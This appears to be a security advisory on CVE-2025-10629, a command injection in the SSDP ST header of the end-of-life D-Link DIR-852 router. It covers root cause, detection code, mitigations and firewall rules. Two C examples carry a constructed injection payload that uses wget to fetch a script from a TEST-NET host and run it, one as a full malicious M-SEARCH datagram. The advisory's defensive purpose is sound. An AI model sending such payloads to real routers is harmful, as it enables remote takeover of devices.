CVE-2025-10629 Overview
CVE-2025-10629 is a command injection vulnerability in the D-Link DIR-852 router running firmware version 1.00CN B09. The flaw is in the ssdpcgi_main function of the htdocs/cgibin binary, the CGI component that handles Simple Service Discovery Protocol (SSDP) requests. An attacker who controls the ST (Search Target) argument can inject arbitrary operating system commands, and the attack can be carried out remotely over the network. Exploitation details have been published, which raises the likelihood of opportunistic abuse. The DIR-852 is end-of-life and no longer maintained by D-Link, so no official patch will be released. The weakness is classified as CWE-77 (Improper Neutralization of Special Elements used in a Command, 'Command Injection'), a child of CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component, 'Injection').
Critical Impact
Remote attackers can inject operating system commands through the SSDP ST parameter on unsupported D-Link DIR-852 routers, with no vendor patch available.
Affected Products
- D-Link DIR-852 hardware (end-of-life)
- D-Link DIR-852 firmware 1.00CN B09
- Simple Service Discovery Protocol service component (htdocs/cgibin, ssdpcgi_main)
Discovery Timeline
- 2025-09-18 - CVE-2025-10629 published to the National Vulnerability Database
- 2026-04-29 - Last updated in NVD database
Technical Details for CVE-2025-10629
Vulnerability Analysis
The vulnerability is in the ssdpcgi_main function of the htdocs/cgibin component of the DIR-852 firmware. This function processes Simple Service Discovery Protocol (SSDP) messages, the UPnP discovery traffic exchanged on local networks. The client-supplied ST (Search Target) value reaches a shell execution context without neutralization of metacharacters, so an attacker who can deliver SSDP traffic to the router obtains arbitrary command execution in the context of the SSDP handler process.
The weakness is tracked under CWE-77, Improper Neutralization of Special Elements used in a Command ('Command Injection'). Because the DIR-852 is no longer supported, the issue will remain unpatched on every deployed unit.
Root Cause
The ssdpcgi_main handler passes attacker-controlled input from the ST argument into a command-construction routine without sanitization or argument escaping. Shell metacharacters such as ;, |, and backticks survive into the command line, so the shell that runs it executes the attacker's additional commands. This is a common pattern in embedded CGI binaries that concatenate request fields directly into system() or an equivalent call. The durable fix is to stop routing request data through a shell at all (exec the helper with an argv and a bounds check on the value); escaping metacharacters is a weaker fallback, because every quoting context the value can land in must be handled correctly.
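The pattern described above, as an added illustration rather than code from the DIR-852 firmware: the unsafe function formats the ST value into a command line of the kind that would be handed to system(), and the hardened function keeps the shell out of the path by placing the value in a single argv cell and exec'ing the helper directly. The helper path /usr/sbin/ssdp_responder and its -st option are hypothetical stand-ins for whatever ssdpcgi_main really invokes; the payload string is constructed for the demonstration and 192.0.2.10 is a TEST-NET address.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Added illustration of the CWE-77 pattern, not code from the DIR-852
 * firmware. The helper path and its "-st" option are hypothetical
 * stand-ins for whatever ssdpcgi_main actually invokes. */
#define SSDP_HELPER "/usr/sbin/ssdp_responder"
#define MAX_ST_LEN 256

/* Vulnerable shape: the request field is formatted straight into a
 * command line meant for system(). Fills cmd with that command line and
 * returns 0; the command is deliberately NOT executed here. */
int build_ssdp_command_unsafe(const char *st, char *cmd, size_t cmd_len)
{
    int n = snprintf(cmd, cmd_len, SSDP_HELPER " -st %s", st);
    if (n < 0 || (size_t)n >= cmd_len)
        return -1;
    /* The firmware-style code would continue with system(cmd), and
     * /bin/sh would then honour ';', '|', '&', backticks and $(...)
     * embedded in st. */
    return 0;
}

/* Hardened shape: keep the shell out of the path. The ST value occupies
 * one argv cell, so metacharacters are handed to the helper verbatim and
 * never interpreted. Returns 0 on success, -1 on rejected input. */
int build_ssdp_argv_safe(const char *helper, const char *st,
                         const char *argv[4])
{
    size_t len = 0;
    while (len <= MAX_ST_LEN && st[len] != '\0')
        len++;
    if (len == 0 || len > MAX_ST_LEN)
        return -1;                  /* bounded: SSDP header values are short */
    if (strpbrk(st, "\r\n") != NULL)
        return -1;                  /* a header value never spans lines */
    argv[0] = helper;
    argv[1] = "-st";
    argv[2] = st;                   /* opaque argument, no shell parsing */
    argv[3] = NULL;
    return 0;
}

/* Replacement for system(): fork, execv the helper directly, wait.
 * Returns the child's exit status, or -1 if it could not be run. */
int spawn_no_shell(const char *const argv[])
{
    int status = 0;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], (char *const *)argv);
        _exit(127);                 /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed payload of the kind the advisory describes;
     * 192.0.2.10 is a TEST-NET address. */
    const char *st = "ssdp:all; wget http://192.0.2.10/x -O /tmp/x; sh /tmp/x";
    char cmd[512];
    const char *argv[4];

    if (build_ssdp_command_unsafe(st, cmd, sizeof cmd) == 0)
        printf("unsafe command line: %s\n", cmd);

    /* /bin/echo stands in for the helper: it prints the whole ST value as
     * a single argument and nothing after the ';' ever runs. */
    if (build_ssdp_argv_safe("/bin/echo", st, argv) == 0)
        spawn_no_shell(argv);
    return 0;
}
```

Run as written, the unsafe path prints a command line in which the attacker's "; wget ..." is indistinguishable from the legitimate part, while the hardened path hands the same bytes to /bin/echo as one argument and the embedded commands are never parsed. Length and CR/LF checks on the value are defense in depth; the property that actually removes the bug is the absence of a shell.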
Attack Vector
Exploitation requires the ability to deliver datagrams to the router's SSDP listener. The attacker crafts an SSDP M-SEARCH (or related discovery) message whose ST header carries shell syntax, and the router evaluates the injected payload while processing the request. Because SSDP is carried over UDP, a single unsolicited datagram is enough and the source address can be spoofed, so the attacker does not need to receive a reply. SSDP normally stays on the LAN, but exposure of UDP port 1900 to untrusted segments or a misconfigured WAN interface widens the attack surface. Public disclosure of exploitation details, referenced in the GitHub CVE Issue Discussion and VulDB entry #324659, lowers the skill barrier for attackers.
Detection Methods for CVE-2025-10629
Indicators of Compromise
- SSDP requests on UDP port 1900 containing shell metacharacters (;, |, &, backticks, $()) inside the ST header.
- Outbound connections from the router to unfamiliar hosts shortly after inbound SSDP traffic.
- Unexpected new processes or persistence artifacts on the router consistent with downloaded payloads.
Detection Strategies
- Inspect network captures for SSDP M-SEARCH messages whose ST value is not one of the standard search targets (ssdp:all, upnp:rootdevice, uuid:<device-id>, or a urn: device or service type) or that carry characters outside the URN character set.
- Deploy IDS signatures that flag non-printable or shell control characters in SSDP headers crossing network segments.
- Correlate router-originated DNS or HTTP traffic with preceding inbound SSDP activity to identify post-exploitation callbacks.
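The indicators and strategies above, applied to actual datagrams: the following added example (not code from the page's sources) extracts the ST header from an SSDP M-SEARCH message, case-insensitively as SSDP requires, and returns a verdict distinguishing a standard search target, a non-standard one, and one carrying shell metacharacters or non-printable bytes. The three sample datagrams are constructed for the example, the injected one mirrors the attack-vector description, and 192.0.2.10 is a TEST-NET address.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added detection example, not code from the page's sources: classify the
 * ST header of an SSDP datagram against the indicators listed above. */
enum ssdp_verdict {
    SSDP_OK = 0,             /* ST present and in a standard UPnP form */
    SSDP_NO_ST = 1,          /* no ST header (NOTIFY carries NT instead) */
    SSDP_NONSTANDARD_ST = 2, /* not ssdp:all, upnp:rootdevice, uuid: or urn: */
    SSDP_SHELL_META = 3      /* shell control or non-printable bytes in ST */
};

/* Case-insensitive test that a header line starts with "name:". */
static int header_name_matches(const char *line, size_t n, const char *name)
{
    size_t k = strlen(name);
    if (n <= k || line[k] != ':')
        return 0;
    for (size_t i = 0; i < k; i++)
        if (tolower((unsigned char)line[i]) != tolower((unsigned char)name[i]))
            return 0;
    return 1;
}

/* Copy the value of the first header called name into out, with the
 * surrounding whitespace and the CR stripped. Returns 1 if found. */
static int ssdp_get_header(const char *pkt, size_t len, const char *name,
                           char *out, size_t out_len)
{
    for (size_t i = 0; i < len; ) {
        size_t eol = i;
        while (eol < len && pkt[eol] != '\n')
            eol++;
        if (header_name_matches(pkt + i, eol - i, name)) {
            size_t v = i + strlen(name) + 1, end = eol, n;
            while (v < end && (pkt[v] == ' ' || pkt[v] == '\t'))
                v++;
            while (end > v && (pkt[end - 1] == '\r' || pkt[end - 1] == ' '))
                end--;
            n = end - v < out_len ? end - v : out_len - 1; /* truncate if needed */
            memcpy(out, pkt + v, n);
            out[n] = '\0';
            return 1;
        }
        i = eol + 1;
    }
    return 0;
}

/* Metacharacters from the IoC list, plus redirection and non-printables. */
static int st_has_shell_meta(const char *st)
{
    if (strpbrk(st, ";|&`$()<>") != NULL)
        return 1;
    for (; *st; st++)
        if (!isprint((unsigned char)*st))
            return 1;
    return 0;
}

/* Standard search targets per the UPnP Device Architecture: ssdp:all,
 * upnp:rootdevice, uuid:<id>, urn:<domain>:device|service:<type>:<ver>. */
static int st_is_standard_syntax(const char *st)
{
    if (strcmp(st, "ssdp:all") == 0 || strcmp(st, "upnp:rootdevice") == 0)
        return 1;
    if (strncmp(st, "uuid:", 5) != 0 && strncmp(st, "urn:", 4) != 0)
        return 0;
    for (const unsigned char *p = (const unsigned char *)st; *p; p++)
        if (!isalnum(*p) && strchr(":-_.", *p) == NULL)
            return 0;
    return 1;
}

/* Classify one datagram; the extracted ST is left in st_out for logging. */
int ssdp_classify(const char *pkt, size_t len, char *st_out, size_t st_len)
{
    if (st_len)
        st_out[0] = '\0';
    if (!ssdp_get_header(pkt, len, "ST", st_out, st_len))
        return SSDP_NO_ST;
    if (st_has_shell_meta(st_out))
        return SSDP_SHELL_META;
    if (!st_is_standard_syntax(st_out))
        return SSDP_NONSTANDARD_ST;
    return SSDP_OK;
}

/* Constructed sample datagrams (192.0.2.10 is a TEST-NET address). */
static const char SAMPLE_BENIGN[] =
    "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
    "MAN: \"ssdp:discover\"\r\nMX: 2\r\n"
    "ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n\r\n";
static const char SAMPLE_INJECTED[] =
    "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
    "MAN: \"ssdp:discover\"\r\nMX: 2\r\n"
    "st: ssdp:all;wget http://192.0.2.10/x -O /tmp/x;sh /tmp/x\r\n\r\n";
static const char SAMPLE_NONSTANDARD[] =
    "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
    "MAN: \"ssdp:discover\"\r\nMX: 2\r\nST: lookup:anything\r\n\r\n";

int main(void)
{
    const char *samples[] = { SAMPLE_BENIGN, SAMPLE_INJECTED, SAMPLE_NONSTANDARD };
    char st[256];
    for (size_t i = 0; i < 3; i++)
        printf("verdict=%d ST=%s\n",
               ssdp_classify(samples[i], strlen(samples[i]), st, sizeof st), st);
    return 0;
}
```

The two-tier verdict matters operationally: SSDP_SHELL_META is a high-confidence alert on its own, while SSDP_NONSTANDARD_ST is noisier (some legitimate clients send vendor-specific targets) and is better used as a correlation input alongside the router-originated callbacks listed above. The same split maps directly onto an IDS signature (metacharacters in the ST value) and a lower-priority anomaly rule (ST outside the standard forms).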
Monitoring Recommendations
- Log and alert on any external traffic reaching UDP 1900 on consumer routers from the WAN side.
- Monitor for sudden firmware behavior changes, including new listening ports or modified DNS resolvers on affected devices.
- Track threat intelligence feeds for botnets known to target D-Link end-of-life models using SSDP injection.
How to Mitigate CVE-2025-10629
Immediate Actions Required
- Replace the DIR-852 with a currently supported router model, since D-Link will not issue a fix.
- Disable UPnP and SSDP services on the router where the configuration permits, then confirm from the LAN that UDP 1900 no longer answers M-SEARCH probes; a management-interface toggle does not always stop the underlying listener.
- Block UDP port 1900 at the network perimeter and segment the router away from untrusted clients.
- Verify the router's WAN interface does not expose SSDP or UPnP to the internet.
Patch Information
No patch is available. D-Link confirms the DIR-852 is no longer supported, and the D-Link Security Information portal directs users to upgrade to supported hardware. Operators should treat continued use as a residual risk requiring compensating controls.
Workarounds
- Place the device behind a firewall that drops inbound SSDP traffic on UDP 1900.
- Restrict LAN-side SSDP to trusted VLANs using access control lists on upstream switches.
- Disable remote administration features and verify the router is not reachable from the WAN.
- Decommission the device if it must operate in environments with untrusted clients.
# Configuration example: block SSDP at an upstream Linux gateway.
# -I inserts at the head of the chain so the drop runs before any earlier
# ACCEPT rule; -A would append after them and could be bypassed.
iptables -I FORWARD -p udp --dport 1900 -j DROP   # SSDP routed through the gateway
iptables -I INPUT -p udp --dport 1900 -j DROP     # SSDP addressed to the gateway itself
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

